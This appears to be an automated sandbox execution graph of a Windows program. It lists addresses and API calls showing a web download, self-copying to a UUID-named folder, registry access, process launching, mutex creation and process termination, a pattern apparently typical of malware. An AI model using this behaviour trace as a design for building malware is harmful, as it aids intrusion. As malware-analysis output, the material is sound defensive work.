                                                                                                  execution_graph 43980 423f84 43981 423f90 __wsopen_helper 43980->43981 44017 432603 GetStartupInfoW 43981->44017 43984 423f95 44019 4278d5 GetProcessHeap 43984->44019 43985 423fed 43986 423ff8 43985->43986 44349 42411a 58 API calls 3 library calls 43985->44349 44020 425141 43986->44020 43989 423ffe 43990 424009 __RTC_Initialize 43989->43990 44350 42411a 58 API calls 3 library calls 43989->44350 44041 428754 43990->44041 43993 424018 43994 424024 GetCommandLineW 43993->43994 44351 42411a 58 API calls 3 library calls 43993->44351 44060 43235f GetEnvironmentStringsW 43994->44060 43997 424023 43997->43994 44000 42403e 44001 424049 44000->44001 44352 427c2e 58 API calls 3 library calls 44000->44352 44070 4321a1 44001->44070 44005 42405a 44084 427c68 44005->44084 44008 424062 44009 42406d __wwincmdln 44008->44009 44354 427c2e 58 API calls 3 library calls 44008->44354 44090 419f90 44009->44090 44012 424081 44013 424090 44012->44013 44346 427f3d 44012->44346 44355 427c59 58 API calls _doexit 44013->44355 44016 424095 __wsopen_helper 44018 432619 44017->44018 44018->43984 44019->43985 44356 427d6c 36 API calls 2 library calls 44020->44356 44022 425146 44357 428c48 InitializeCriticalSectionAndSpinCount __getstream 44022->44357 44024 42514b 44025 42514f 44024->44025 44359 4324f7 TlsAlloc 44024->44359 44358 4251b7 61 API calls 2 library calls 44025->44358 44028 425154 44028->43989 44029 425161 44029->44025 44030 42516c 44029->44030 44360 428c96 44030->44360 44033 4251ae 44368 4251b7 61 API calls 2 library calls 44033->44368 44036 42518d 44036->44033 44038 425193 44036->44038 44037 4251b3 44037->43989 44367 42508e 58 API calls 4 library calls 44038->44367 44040 42519b GetCurrentThreadId 44040->43989 44042 428760 __wsopen_helper 44041->44042 44380 428af7 44042->44380 44044 428767 44045 428c96 __calloc_crt 58 API calls 44044->44045 44046 428778 44045->44046 44047 4287e3 GetStartupInfoW 44046->44047 44049 428783 __wsopen_helper @_EH4_CallFilterFunc@8 44046->44049 44048 428927 44047->44048 44055 4287f8 44047->44055 44050 4289ef 44048->44050 44053 428974 GetStdHandle 44048->44053 44054 428987 GetFileType 44048->44054 44388 43263e InitializeCriticalSectionAndSpinCount 44048->44388 44049->43993 44389 4289ff LeaveCriticalSection _doexit 44050->44389 44052 428c96 __calloc_crt 58 API calls 44052->44055 44053->44048 44054->44048 44055->44048 44055->44052 44057 428846 44055->44057 44056 42887a GetFileType 44056->44057 44057->44048 44057->44056 44387 43263e InitializeCriticalSectionAndSpinCount 44057->44387 44061 432370 44060->44061 44062 424034 44060->44062 44392 428cde 58 API calls 2 library calls 44061->44392 44066 431f64 GetModuleFileNameW 44062->44066 44064 4323ac FreeEnvironmentStringsW 44064->44062 44065 432396 __expandlocale 44065->44064 44067 431f98 _wparse_cmdline 44066->44067 44069 431fd8 _wparse_cmdline 44067->44069 44393 428cde 58 API calls 2 library calls 44067->44393 44069->44000 44071 42404f 44070->44071 44072 4321ba _LangCountryEnumProc@4 44070->44072 44071->44005 44353 427c2e 58 API calls 3 library calls 44071->44353 44073 428c96 __calloc_crt 58 API calls 44072->44073 44080 4321e3 _LangCountryEnumProc@4 44073->44080 44074 43223a 44395 420bed 58 API calls 2 library calls 44074->44395 44076 428c96 __calloc_crt 58 API calls 44076->44080 44077 43225f 44396 420bed 58 API calls 2 library calls 44077->44396 44080->44071 44080->44074 44080->44076 44080->44077 44081 432276 44080->44081 44394 42962f 58 API calls __write_nolock 44080->44394 44397 4242fd 8 API calls 2 library calls 44081->44397 44083 432282 44086 427c74 __IsNonwritableInCurrentImage 44084->44086 44398 43aeb5 44086->44398 44087 427c92 __initterm_e 44089 427cb1 _doexit __IsNonwritableInCurrentImage 44087->44089 44401 4219ac 67 API calls __cinit 44087->44401 44089->44008 44091 419fa0 __write_nolock 44090->44091 44402 40cf10 44091->44402 44093 419fb0 44094 419fc4 GetCurrentProcess GetLastError SetPriorityClass 44093->44094 44095 419fb4 44093->44095 44097 419fe4 GetLastError 44094->44097 44098 419fe6 44094->44098 44626 4124e0 109 API calls _memset 44095->44626 44097->44098 44416 41d3c0 44098->44416 44099 419fb9 44099->44012 44102 41a022 44419 41d340 44102->44419 44103 41b669 44724 44f23e 59 API calls 2 library calls 44103->44724 44105 41b673 44725 44f23e 59 API calls 2 library calls 44105->44725 44110 41a065 44424 413a90 44110->44424 44114 41a159 GetCommandLineW CommandLineToArgvW lstrcpyW 44116 41a33d GlobalFree 44114->44116 44130 41a196 44114->44130 44115 41a100 44115->44114 44117 41a354 44116->44117 44118 41a45c 44116->44118 44119 412220 76 API calls 44117->44119 44480 412220 44118->44480 44121 41a359 44119->44121 44123 41a466 44121->44123 44495 40ef50 44121->44495 44122 41a1cc lstrcmpW lstrcmpW 44122->44130 44123->44012 44125 41a24a lstrcpyW lstrcpyW lstrcmpW lstrcmpW 44125->44130 44126 420235 60 API calls _LangCountryEnumProc@4 44126->44130 44127 41a48f 44129 41a4ef 44127->44129 44500 413ea0 44127->44500 44131 411cd0 92 API calls 44129->44131 44130->44116 44130->44122 44130->44125 44130->44126 44132 41a361 44130->44132 44133 41a563 44131->44133 44440 423c92 44132->44440 44167 41a5db 44133->44167 44521 414690 44133->44521 44136 41a395 OpenProcess 44137 41a402 44136->44137 44138 41a3a9 WaitForSingleObject CloseHandle 44136->44138 44443 411cd0 44137->44443 44138->44137 44141 41a3cb 44138->44141 44139 41a6f9 44628 411a10 8 API calls 44139->44628 44157 41a3e2 GlobalFree 44141->44157 44158 41a3d4 Sleep 44141->44158 44627 411ab0 PeekMessageW DispatchMessageW PeekMessageW 44141->44627 44142 41a6fe 44146 41a8b6 CreateMutexA 44142->44146 44147 41a70f 44142->44147 44143 41a5a9 44149 414690 59 API calls 44143->44149 44152 41a8ca 44146->44152 44151 41a7dc 44147->44151 44162 40ef50 58 API calls 44147->44162 44154 41a5d4 44149->44154 44150 41a40b GetCurrentProcess GetExitCodeProcess TerminateProcess CloseHandle 44155 41a451 44150->44155 44159 40ef50 58 API calls 44151->44159 44156 40ef50 58 API calls 44152->44156 44153 41a624 GetVersion 44153->44139 44160 41a632 lstrcpyW lstrcatW lstrcatW 44153->44160 44544 40d240 CoInitialize 44154->44544 44155->44012 44170 41a8da 44156->44170 44163 41a3f7 44157->44163 44158->44136 44164 41a7ec 44159->44164 44165 41a674 _memset 44160->44165 44172 41a72f 44162->44172 44163->44012 44166 41a7f1 lstrlenA 44164->44166 44169 41a6b4 ShellExecuteExW 44165->44169 44630 420c62 44166->44630 44167->44139 44167->44142 44167->44146 44167->44153 44169->44142 44191 41a6e3 44169->44191 44173 413ea0 59 API calls 44170->44173 44185 41a92f 44170->44185 44171 41a810 _memset 44175 41a81e MultiByteToWideChar lstrcatW 44171->44175 44174 413ea0 59 API calls 44172->44174 44177 41a780 44172->44177 44173->44170 44174->44172 44175->44166 44176 41a847 lstrlenW 44175->44176 44178 41a8a0 CreateMutexA 44176->44178 44179 41a856 44176->44179 44180 41a792 44177->44180 44181 41a79c CreateThread 44177->44181 44178->44152 44647 40e760 95 API calls 44179->44647 44629 413ff0 59 API calls __expandlocale 44180->44629 44181->44151 44186 41a7d0 44181->44186 45029 41dbd0 95 API calls 4 library calls 44181->45029 44184 41a860 CreateThread WaitForSingleObject 44184->44178 45030 41e690 203 API calls 8 library calls 44184->45030 44648 415c10 44185->44648 44186->44151 44188 41a98c 44663 412840 60 API calls 44188->44663 44190 41a997 44664 410fc0 93 API calls 4 library calls 44190->44664 44191->44012 44193 41a9ab 44194 41a9c2 lstrlenA 44193->44194 44194->44191 44195 41a9d8 44194->44195 44196 415c10 59 API calls 44195->44196 44197 41aa23 44196->44197 44665 412840 60 API calls 44197->44665 44199 41aa2e lstrcpyA 44201 41aa4b 44199->44201 44202 415c10 59 API calls 44201->44202 44203 41aa90 44202->44203 44204 40ef50 58 API calls 44203->44204 44205 41aaa0 44204->44205 44206 413ea0 59 API calls 44205->44206 44207 41aaf5 44205->44207 44206->44205 44666 413ff0 59 API calls __expandlocale 44207->44666 44209 41ab1d 44667 412900 44209->44667 44211 40ef50 58 API calls 44213 41abc5 44211->44213 44212 41ab28 _memmove 44212->44211 44214 413ea0 59 API calls 44213->44214 44215 41ac1e 44213->44215 44214->44213 44672 413ff0 59 API calls __expandlocale 44215->44672 44217 41ac46 44218 412900 60 API calls 44217->44218 44220 41ac51 _memmove 44218->44220 44219 40ef50 58 API calls 44221 41acee 44219->44221 44220->44219 44222 413ea0 59 API calls 44221->44222 44223 41ad43 44221->44223 44222->44221 44673 413ff0 59 API calls __expandlocale 44223->44673 44225 41ad6b 44226 412900 60 API calls 44225->44226 44229 41ad76 _memmove 44226->44229 44227 415c10 59 API calls 44228 41ae2a 44227->44228 44674 413580 59 API calls 44228->44674 44229->44227 44231 41ae3c 44232 415c10 59 API calls 44231->44232 44233 41ae76 44232->44233 44675 413580 59 API calls 44233->44675 44235 41ae82 44236 415c10 59 API calls 44235->44236 44237 41aebc 44236->44237 44676 413580 59 API calls 44237->44676 44239 41aec8 44240 415c10 59 API calls 44239->44240 44241 41af02 44240->44241 44677 413580 59 API calls 44241->44677 44243 41af0e 44244 415c10 59 API calls 44243->44244 44245 41af48 44244->44245 44678 413580 59 API calls 44245->44678 44247 41af54 44248 415c10 59 API calls 44247->44248 44249 41af8e 44248->44249 44679 413580 59 API calls 44249->44679 44251 41af9a 44252 415c10 59 API calls 44251->44252 44253 41afd4 44252->44253 44680 413580 59 API calls 44253->44680 44255 41afe0 44681 413100 59 API calls 44255->44681 44257 41b001 44682 413580 59 API calls 44257->44682 44259 41b025 44683 413100 59 API calls 44259->44683 44261 41b03c 44684 413580 59 API calls 44261->44684 44263 41b059 44685 413100 59 API calls 44263->44685 44265 41b070 44686 413580 59 API calls 44265->44686 44267 41b07c 44687 413100 59 API calls 44267->44687 44269 41b093 44688 413580 59 API calls 44269->44688 44271 41b09f 44689 413100 59 API calls 44271->44689 44273 41b0b6 44690 413580 59 API calls 44273->44690 44275 41b0c2 44691 413100 59 API calls 44275->44691 44277 41b0d9 44692 413580 59 API calls 44277->44692 44279 41b0e5 44693 413100 59 API calls 44279->44693 44281 41b0fc 44694 413580 59 API calls 44281->44694 44283 41b108 44285 41b130 44283->44285 44695 41cdd0 59 API calls 44283->44695 44286 40ef50 58 API calls 44285->44286 44287 41b16e 44286->44287 44289 41b1a5 GetUserNameW 44287->44289 44696 412de0 59 API calls 44287->44696 44290 41b1c9 44289->44290 44697 412c40 44290->44697 44292 41b1d8 44704 412bf0 59 API calls 44292->44704 44294 41b1ea 44705 40ecb0 60 API calls 2 library calls 44294->44705 44296 41b2f5 44708 4136c0 59 API calls 44296->44708 44298 41b308 44709 40ca70 59 API calls 44298->44709 44300 41b311 44710 4130b0 59 API calls 44300->44710 44302 412c40 59 API calls 44317 41b1f3 44302->44317 44303 41b322 44711 40c740 120 API calls 4 library calls 44303->44711 44305 412900 60 API calls 44305->44317 44306 41b327 44712 4111c0 169 API calls 2 library calls 44306->44712 44309 41b33b 44713 41ba10 LoadCursorW RegisterClassExW 44309->44713 44311 41b343 44714 41ba80 CreateWindowExW ShowWindow UpdateWindow 44311->44714 44313 413100 59 API calls 44313->44317 44314 41b34b 44318 41b34f 44314->44318 44715 410a50 65 API calls 44314->44715 44317->44296 44317->44302 44317->44305 44317->44313 44706 413580 59 API calls 44317->44706 44707 40f1f0 59 API calls 44317->44707 44318->44191 44319 41b379 44716 413100 59 API calls 44319->44716 44321 41b3a5 44717 413580 59 API calls 44321->44717 44323 41b48b 44723 41fdc0 CreateThread 44323->44723 44325 41b49f GetMessageW 44326 41b4ed 44325->44326 44327 41b4bf 44325->44327 44328 41b502 PostThreadMessageW 44326->44328 44329 41b55b 44326->44329 44330 41b4c5 TranslateMessage DispatchMessageW GetMessageW 44327->44330 44332 41b510 PeekMessageW 44328->44332 44333 41b564 PostThreadMessageW 44329->44333 44334 41b5bb 44329->44334 44330->44326 44330->44330 44335 41b546 WaitForSingleObject 44332->44335 44336 41b526 DispatchMessageW PeekMessageW 44332->44336 44337 41b570 PeekMessageW 44333->44337 44334->44318 44340 41b5d2 CloseHandle 44334->44340 44335->44329 44335->44332 44336->44335 44336->44336 44338 41b5a6 WaitForSingleObject 44337->44338 44339 41b586 DispatchMessageW PeekMessageW 44337->44339 44338->44334 44338->44337 44339->44338 44339->44339 44340->44318 44345 41b3b3 44345->44323 44718 41c330 59 API calls 44345->44718 44719 41c240 59 API calls 44345->44719 44720 41b8b0 59 API calls 44345->44720 44721 413260 59 API calls 44345->44721 44722 41fa10 CreateThread 44345->44722 45031 427e0e 44346->45031 44348 427f4c 44348->44013 44349->43986 44350->43990 44351->43997 44355->44016 44356->44022 44357->44024 44358->44028 44359->44029 44361 428c9d 44360->44361 44363 425179 44361->44363 44365 428cbb 44361->44365 44369 43b813 44361->44369 44363->44033 44366 432553 TlsSetValue 44363->44366 44365->44361 44365->44363 44377 4329c9 Sleep 44365->44377 44366->44036 44367->44040 44368->44037 44370 43b81e 44369->44370 44373 43b839 44369->44373 44371 43b82a 44370->44371 44370->44373 44378 425208 58 API calls __getptd_noexit 44371->44378 44372 43b849 HeapAlloc 44372->44373 44375 43b82f 44372->44375 44373->44372 44373->44375 44379 42793d DecodePointer 44373->44379 44375->44361 44377->44365 44378->44375 44379->44373 44381 428b1b EnterCriticalSection 44380->44381 44382 428b08 44380->44382 44381->44044 44390 428b9f 58 API calls 10 library calls 44382->44390 44384 428b0e 44384->44381 44391 427c2e 58 API calls 3 library calls 44384->44391 44387->44057 44388->44048 44389->44049 44390->44384 44392->44065 44393->44069 44394->44080 44395->44071 44396->44071 44397->44083 44399 43aeb8 EncodePointer 44398->44399 44399->44399 44400 43aed2 44399->44400 44400->44087 44401->44089 44403 40cf32 _memset __write_nolock 44402->44403 44404 40cf4f InternetOpenW 44403->44404 44405 415c10 59 API calls 44404->44405 44406 40cf8a InternetOpenUrlW 44405->44406 44407 40cfb9 InternetReadFile InternetCloseHandle InternetCloseHandle 44406->44407 44415 40cfb2 44406->44415 44726 4156d0 44407->44726 44409 40d000 44410 4156d0 59 API calls 44409->44410 44411 40d049 44410->44411 44411->44415 44745 413010 59 API calls 44411->44745 44413 40d084 44413->44415 44746 413010 59 API calls 44413->44746 44415->44093 44751 41ccc0 44416->44751 44771 41cc50 44419->44771 44422 41a04d 44422->44105 44422->44110 44425 413ab2 44424->44425 44431 413ad0 GetModuleFileNameW PathRemoveFileSpecW 44424->44431 44426 413b00 44425->44426 44427 413aba 44425->44427 44779 44f23e 59 API calls 2 library calls 44426->44779 44428 423b4c 59 API calls 44427->44428 44430 413ac7 44428->44430 44430->44431 44780 44f1bb 59 API calls 3 library calls 44430->44780 44434 418400 44431->44434 44435 418437 44434->44435 44439 418446 44434->44439 44435->44439 44781 415d50 59 API calls __expandlocale 44435->44781 44437 4184b9 44437->44115 44439->44437 44782 418d50 59 API calls 44439->44782 44783 431781 44440->44783 44801 42f7c0 44443->44801 44446 411d20 _memset 44447 411d40 RegQueryValueExW RegCloseKey 44446->44447 44448 411d8f 44447->44448 44449 415c10 59 API calls 44448->44449 44450 411dbf 44449->44450 44451 411dd1 lstrlenA 44450->44451 44452 411e7c 44450->44452 44803 413520 59 API calls 44451->44803 44454 411e94 6 API calls 44452->44454 44456 411ef5 UuidCreate UuidToStringW 44454->44456 44455 411df1 44457 411e3c PathFileExistsW 44455->44457 44458 411e00 44455->44458 44459 411f36 44456->44459 44457->44452 44460 411e52 44457->44460 44458->44455 44458->44457 44462 415c10 59 API calls 44459->44462 44461 411e6a 44460->44461 44464 414690 59 API calls 44460->44464 44470 4121d1 44461->44470 44463 411f59 RpcStringFreeW PathAppendW CreateDirectoryW 44462->44463 44466 411fce 44463->44466 44468 411f98 44463->44468 44464->44461 44465 415c10 59 API calls 44465->44466 44467 415c10 59 API calls 44466->44467 44469 41201f PathAppendW DeleteFileW CopyFileW RegOpenKeyExW 44467->44469 44468->44465 44469->44470 44471 41207c _memset 44469->44471 44470->44150 44472 412095 6 API calls 44471->44472 44473 412115 _memset 44472->44473 44474 412109 44472->44474 44476 412125 SetLastError lstrcpyW lstrcatW lstrcatW CreateProcessW 44473->44476 44804 413260 59 API calls 44474->44804 44477 4121b2 44476->44477 44478 4121aa GetLastError 44476->44478 44479 4121c0 WaitForSingleObject 44477->44479 44478->44470 44479->44470 44479->44479 44481 42f7c0 __write_nolock 44480->44481 44482 41222d 7 API calls 44481->44482 44483 4122bd K32EnumProcesses 44482->44483 44484 41228c LoadLibraryW GetProcAddress GetProcAddress GetProcAddress 44482->44484 44485 4122d3 44483->44485 44486 4122df 44483->44486 44484->44483 44485->44121 44487 412353 44486->44487 44488 4122f0 OpenProcess 44486->44488 44487->44121 44489 412346 CloseHandle 44488->44489 44490 41230a K32EnumProcessModules 44488->44490 44489->44487 44489->44488 44490->44489 44491 41231c K32GetModuleBaseNameW 44490->44491 44805 420235 44491->44805 44493 41233e 44493->44489 44494 412345 44493->44494 44494->44489 44496 420c62 _malloc 58 API calls 44495->44496 44499 40ef6e _memset 44496->44499 44497 40efdc 44497->44127 44498 420c62 _malloc 58 API calls 44498->44499 44499->44497 44499->44498 44499->44499 44501 413f05 44500->44501 44507 413eae 44500->44507 44502 413fb1 44501->44502 44503 413f18 44501->44503 44821 44f23e 59 API calls 2 library calls 44502->44821 44505 413fbb 44503->44505 44506 413f2d 44503->44506 44513 413f3d __expandlocale 44503->44513 44822 44f23e 59 API calls 2 library calls 44505->44822 44506->44513 44820 416760 59 API calls 2 library calls 44506->44820 44507->44501 44511 413ed4 44507->44511 44514 413ed9 44511->44514 44515 413eef 44511->44515 44513->44127 44818 413da0 59 API calls __expandlocale 44514->44818 44819 413da0 59 API calls __expandlocale 44515->44819 44519 413ee9 44519->44127 44520 413eff 44520->44127 44522 4146a9 44521->44522 44523 41478c 44521->44523 44525 4146b6 44522->44525 44526 4146e9 44522->44526 44825 44f26c 59 API calls 3 library calls 44523->44825 44527 414796 44525->44527 44528 4146c2 44525->44528 44529 4147a0 44526->44529 44530 4146f5 44526->44530 44826 44f26c 59 API calls 3 library calls 44527->44826 44823 413340 59 API calls _memmove 44528->44823 44827 44f23e 59 API calls 2 library calls 44529->44827 44540 414707 __expandlocale 44530->44540 44824 416950 59 API calls 2 library calls 44530->44824 44539 4146e0 44539->44143 44540->44143 44545 40d276 44544->44545 44546 40d27d CoInitializeSecurity 44544->44546 44545->44167 44547 414690 59 API calls 44546->44547 44548 40d2b8 CoCreateInstance 44547->44548 44549 40d2e3 VariantInit VariantInit VariantInit VariantInit 44548->44549 44550 40da3c CoUninitialize 44548->44550 44551 40d38e VariantClear VariantClear VariantClear VariantClear 44549->44551 44550->44545 44552 40d3e2 44551->44552 44553 40d3cc CoUninitialize 44551->44553 44828 40b140 44552->44828 44553->44545 44556 40d3f6 44833 40b1d0 44556->44833 44558 40d422 44559 40d426 CoUninitialize 44558->44559 44560 40d43c 44558->44560 44559->44545 44561 40b140 60 API calls 44560->44561 44563 40d449 44561->44563 44564 40b1d0 SysFreeString 44563->44564 44565 40d471 44564->44565 44566 40d496 CoUninitialize 44565->44566 44567 40d4ac 44565->44567 44566->44545 44569 40d8cf 44567->44569 44570 40b140 60 API calls 44567->44570 44569->44550 44571 40d4d5 44570->44571 44572 40b1d0 SysFreeString 44571->44572 44573 40d4fd 44572->44573 44573->44569 44574 40b140 60 API calls 44573->44574 44575 40d5ae 44574->44575 44576 40b1d0 SysFreeString 44575->44576 44577 40d5d6 44576->44577 44577->44569 44578 40b140 60 API calls 44577->44578 44579 40d679 44578->44579 44580 40b1d0 SysFreeString 44579->44580 44581 40d6a1 44580->44581 44581->44569 44582 40b140 60 API calls 44581->44582 44583 40d6b6 44582->44583 44584 40b1d0 SysFreeString 44583->44584 44585 40d6de 44584->44585 44585->44569 44586 40b140 60 API calls 44585->44586 44587 40d707 44586->44587 44588 40b1d0 SysFreeString 44587->44588 44589 40d72f 44588->44589 44589->44569 44590 40b140 60 API calls 44589->44590 44591 40d744 44590->44591 44592 40b1d0 SysFreeString 44591->44592 44593 40d76c 44592->44593 44593->44569 44837 423aaf GetSystemTimeAsFileTime 44593->44837 44595 40d77d 44839 423551 44595->44839 44600 412c40 59 API calls 44601 40d7b5 44600->44601 44602 412900 60 API calls 44601->44602 44603 40d7c3 44602->44603 44604 40b140 60 API calls 44603->44604 44605 40d7db 44604->44605 44606 40b1d0 SysFreeString 44605->44606 44607 40d7ff 44606->44607 44607->44569 44608 40b140 60 API calls 44607->44608 44609 40d8a3 44608->44609 44610 40b1d0 SysFreeString 44609->44610 44611 40d8cb 44610->44611 44611->44569 44612 40b140 60 API calls 44611->44612 44613 40d8ea 44612->44613 44614 40b1d0 SysFreeString 44613->44614 44615 40d912 44614->44615 44615->44569 44847 40b400 SysAllocString 44615->44847 44617 40d936 VariantInit VariantInit 44618 40b140 60 API calls 44617->44618 44619 40d985 44618->44619 44620 40b1d0 SysFreeString 44619->44620 44621 40d9e7 VariantClear VariantClear VariantClear 44620->44621 44622 40da10 44621->44622 44623 40da46 CoUninitialize 44621->44623 44851 42052a 78 API calls vswprintf 44622->44851 44623->44545 44626->44099 44627->44141 44628->44142 44629->44181 44631 420cdd 44630->44631 44638 420c6e 44630->44638 45019 42793d DecodePointer 44631->45019 44633 420ce3 45020 425208 58 API calls __getptd_noexit 44633->45020 44636 420ca1 RtlAllocateHeap 44636->44638 44646 420cd5 44636->44646 44638->44636 44639 420c79 44638->44639 44640 420cc9 44638->44640 44644 420cc7 44638->44644 45016 42793d DecodePointer 44638->45016 44639->44638 45011 427f51 58 API calls 2 library calls 44639->45011 45012 427fae 58 API calls 9 library calls 44639->45012 45013 427b0b 44639->45013 45017 425208 58 API calls __getptd_noexit 44640->45017 45018 425208 58 API calls __getptd_noexit 44644->45018 44646->44171 44647->44184 44649 415c66 44648->44649 44650 415c1e 44648->44650 44651 415c76 44649->44651 44652 415cff 44649->44652 44650->44649 44660 415c45 44650->44660 44658 415c88 __expandlocale 44651->44658 45025 416950 59 API calls 2 library calls 44651->45025 45026 44f23e 59 API calls 2 library calls 44652->45026 44658->44188 44661 414690 59 API calls 44660->44661 44662 415c60 44661->44662 44662->44188 44663->44190 44664->44193 44665->44199 44666->44209 44668 413a90 59 API calls 44667->44668 44669 41294c MultiByteToWideChar 44668->44669 44670 418400 59 API calls 44669->44670 44671 41298d 44670->44671 44671->44212 44672->44217 44673->44225 44674->44231 44675->44235 44676->44239 44677->44243 44678->44247 44679->44251 44680->44255 44681->44257 44682->44259 44683->44261 44684->44263 44685->44265 44686->44267 44687->44269 44688->44271 44689->44273 44690->44275 44691->44277 44692->44279 44693->44281 44694->44283 44695->44285 44696->44287 44698 412c71 44697->44698 44699 412c5f 44697->44699 44702 4156d0 59 API calls 44698->44702 44700 4156d0 59 API calls 44699->44700 44701 412c6a 44700->44701 44701->44292 44703 412c8a 44702->44703 44703->44292 44704->44294 44705->44317 44706->44317 44707->44317 44708->44298 44709->44300 44710->44303 44711->44306 44712->44309 44713->44311 44714->44314 44715->44319 44716->44321 44717->44345 44718->44345 44719->44345 44720->44345 44721->44345 44722->44345 45027 41f130 218 API calls _LangCountryEnumProc@4 44722->45027 44723->44325 45028 41fd80 64 API calls 44723->45028 44727 415735 44726->44727 44728 4156de 44726->44728 44729 4157bc 44727->44729 44730 41573e 44727->44730 44728->44727 44737 415704 44728->44737 44750 44f23e 59 API calls 2 library calls 44729->44750 44733 415750 __expandlocale 44730->44733 44749 416760 59 API calls 2 library calls 44730->44749 44733->44409 44739 415709 44737->44739 44740 41571f 44737->44740 44747 413ff0 59 API calls __expandlocale 44739->44747 44748 413ff0 59 API calls __expandlocale 44740->44748 44743 415719 44743->44409 44744 41572f 44744->44409 44745->44413 44746->44415 44747->44743 44748->44744 44749->44733 44757 423b4c 44751->44757 44753 41ccca 44756 41a00a 44753->44756 44767 44f1bb 59 API calls 3 library calls 44753->44767 44756->44102 44756->44103 44759 423b54 44757->44759 44758 420c62 _malloc 58 API calls 44758->44759 44759->44758 44760 423b6e 44759->44760 44762 423b72 std::exception::exception 44759->44762 44768 42793d DecodePointer 44759->44768 44760->44753 44769 430eca RaiseException 44762->44769 44764 423b9c 44770 430d91 58 API calls _free 44764->44770 44766 423bae 44766->44753 44768->44759 44769->44764 44770->44766 44772 423b4c 59 API calls 44771->44772 44773 41cc5d 44772->44773 44774 41cc64 44773->44774 44778 44f1bb 59 API calls 3 library calls 44773->44778 44774->44422 44777 41d740 59 API calls 44774->44777 44777->44422 44781->44439 44782->44439 44786 431570 44783->44786 44787 431580 44786->44787 44788 431586 44787->44788 44793 4315ae 44787->44793 44797 425208 58 API calls __getptd_noexit 44788->44797 44790 43158b 44798 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44790->44798 44796 4315cf wcstoxl 44793->44796 44799 42e883 GetStringTypeW 44793->44799 44794 41a36e lstrcpyW lstrcpyW 44794->44136 44796->44794 44800 425208 58 API calls __getptd_noexit 44796->44800 44797->44790 44798->44794 44799->44793 44800->44794 44802 411cf2 RegOpenKeyExW 44801->44802 44802->44446 44802->44470 44803->44455 44804->44473 44806 420241 44805->44806 44807 4202b6 44805->44807 44814 420266 44806->44814 44815 425208 58 API calls __getptd_noexit 44806->44815 44817 4202c8 60 API calls 3 library calls 44807->44817 44810 4202c3 44810->44493 44811 42024d 44816 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44811->44816 44813 420258 44813->44493 44814->44493 44815->44811 44816->44813 44817->44810 44818->44519 44819->44520 44820->44513 44823->44539 44824->44540 44825->44527 44826->44529 44829 423b4c 59 API calls 44828->44829 44830 40b164 44829->44830 44831 40b177 SysAllocString 44830->44831 44832 40b194 44830->44832 44831->44832 44832->44556 44834 40b1de 44833->44834 44836 40b202 44833->44836 44835 40b1f5 SysFreeString 44834->44835 44834->44836 44835->44836 44836->44558 44838 423add __aulldiv 44837->44838 44838->44595 44852 43035d 44839->44852 44841 42355a 44843 40d78f 44841->44843 44860 423576 44841->44860 44844 4228e0 44843->44844 44964 42279f 44844->44964 44848 40b423 44847->44848 44849 40b41d 44847->44849 44850 40b42d VariantClear 44848->44850 44849->44617 44850->44617 44851->44569 44893 42501f 58 API calls 4 library calls 44852->44893 44854 430363 44855 430369 44854->44855 44856 43038d 44854->44856 44895 428cde 58 API calls 2 library calls 44854->44895 44855->44856 44894 425208 58 API calls __getptd_noexit 44855->44894 44856->44841 44859 43036e 44859->44841 44861 423591 44860->44861 44862 4235a9 _memset 44860->44862 44904 425208 58 API calls __getptd_noexit 44861->44904 44862->44861 44869 4235c0 44862->44869 44864 423596 44905 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44864->44905 44866 4235cb 44906 425208 58 API calls __getptd_noexit 44866->44906 44867 4235e9 44896 42fb64 44867->44896 44869->44866 44869->44867 44871 4235ee 44907 42f803 58 API calls __write_nolock 44871->44907 44873 4235f7 44874 4237e5 44873->44874 44908 42f82d 58 API calls __write_nolock 44873->44908 44921 4242fd 8 API calls 2 library calls 44874->44921 44877 4237ef 44878 423609 44878->44874 44909 42f857 44878->44909 44880 42361b 44880->44874 44881 423624 44880->44881 44882 42369b 44881->44882 44884 423637 44881->44884 44919 42f939 58 API calls 4 library calls 44882->44919 44916 42f939 58 API calls 4 library calls 44884->44916 44885 4236a2 44892 4235a0 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 44885->44892 44920 42fbb4 58 API calls 4 library calls 44885->44920 44887 42364f 44887->44892 44917 42fbb4 58 API calls 4 library calls 44887->44917 44890 423668 44890->44892 44918 42f939 58 API calls 4 library calls 44890->44918 44892->44843 44893->44854 44894->44859 44895->44855 44897 42fb70 __wsopen_helper 44896->44897 44898 42fba5 __wsopen_helper 44897->44898 44899 428af7 __lock 58 API calls 44897->44899 44898->44871 44900 42fb80 44899->44900 44903 42fb93 44900->44903 44922 42fe47 44900->44922 44951 42fbab LeaveCriticalSection _doexit 44903->44951 44904->44864 44905->44892 44906->44892 44907->44873 44908->44878 44910 42f861 44909->44910 44911 42f876 44909->44911 44962 425208 58 API calls __getptd_noexit 44910->44962 44911->44880 44913 42f866 44963 4242d2 9 API calls __invalid_parameter_noinfo_noreturn 44913->44963 44915 42f871 44915->44880 44916->44887 44917->44890 44918->44892 44919->44885 44920->44892 44921->44877 44923 42fe53 __wsopen_helper 44922->44923 44924 428af7 __lock 58 API calls 44923->44924 44925 42fe71 __tzset_nolock 44924->44925 44926 42f857 __tzset_nolock 58 API calls 44925->44926 44927 42fe86 44926->44927 44942 42ff25 __tzset_nolock 44927->44942 44952 42f803 58 API calls __write_nolock 44927->44952 44930 42fe98 44930->44942 44953 42f82d 58 API calls __write_nolock 44930->44953 44931 42ff71 GetTimeZoneInformation 44931->44942 44934 42feaa 44934->44942 44954 433f99 58 API calls 2 library calls 44934->44954 44936 42ffd8 WideCharToMultiByte 44936->44942 44937 42feb8 44955 441667 78 API calls 3 library calls 44937->44955 44938 430010 WideCharToMultiByte 44938->44942 44941 42ff0c _strlen 44957 428cde 58 API calls 2 library calls 44941->44957 44942->44931 44942->44936 44942->44938 44943 430157 __tzset_nolock __wsopen_helper 44942->44943 44949 43ff8e 58 API calls __tzset_nolock 44942->44949 44950 423c2d 61 API calls __tzset_nolock 44942->44950 44959 4242fd 8 API calls 2 library calls 44942->44959 44960 420bed 58 API calls 2 library calls 44942->44960 44961 4300d7 LeaveCriticalSection _doexit 44942->44961 44943->44903 44945 42fed9 __tzset_nolock 44945->44941 44945->44942 44956 420bed 58 API calls 2 library calls 44945->44956 44946 42ff1a _strlen 44946->44942 44958 42c0fd 58 API calls __write_nolock 44946->44958 44949->44942 44950->44942 44951->44898 44952->44930 44953->44934 44954->44937 44955->44945 44956->44941 44957->44946 